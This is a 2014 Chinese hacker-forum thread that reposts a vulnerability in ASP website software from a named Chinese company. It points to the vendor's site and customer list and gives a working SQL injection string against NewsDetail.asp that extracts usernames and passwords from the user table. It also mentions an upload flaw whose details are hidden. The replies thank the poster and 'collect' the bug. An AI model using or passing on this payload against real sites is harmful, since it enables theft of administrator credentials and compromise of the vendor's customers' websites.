gty48 发表于 2014-6-16 12:28:24

发小洞一枚,我是搬运工

原作者:傻傻的xj


扬州北斗科技有限公司所写的asp程序存在上传文件漏洞+注入.

官方网:http://www.www7.cn/ 客户案例:http://www.www7.cn/case/

注入:/NewsDetail.asp?id=22 UNION SELECT 1,2,3,user,Psw,6,7,8,9,10,11,12,13 from user

http://attach.blackbap.org/forum/201405/22/164242fjfmujumbj5mxm3w.jpg

http://attach.blackbap.org/forum/201405/22/164404e69eki532air25eo.jpg


搜索关键字

**** Hidden Message *****

上传

**** Hidden Message *****

ps
谁要silic邀请啊?

vivi 发表于 2014-6-16 12:46:57

这个很早之前都有人提交给wooyun了。

vivi 发表于 2014-6-16 12:48:04

可惜乌云一直没反映,可能是因为小厂商的原因吧。

90_ 发表于 2014-6-16 13:36:01

连图片都是外链进来的,真够懒的

蓝色_ 发表于 2014-6-16 15:44:50

感谢分享!:loveliness:

灰色 发表于 2014-6-16 16:05:47

Petrel 发表于 2014-6-16 16:13:40

习科的哦有点坑
出现logo了

zhoujian017 发表于 2014-6-16 17:08:35

我来看看啊

Alt93 发表于 2014-6-16 17:20:26

收洞收洞。。

910825655 发表于 2014-6-16 17:32:38

页: [1] 2 3 4 5 6
查看完整版本: 发小洞一枚,我是搬运工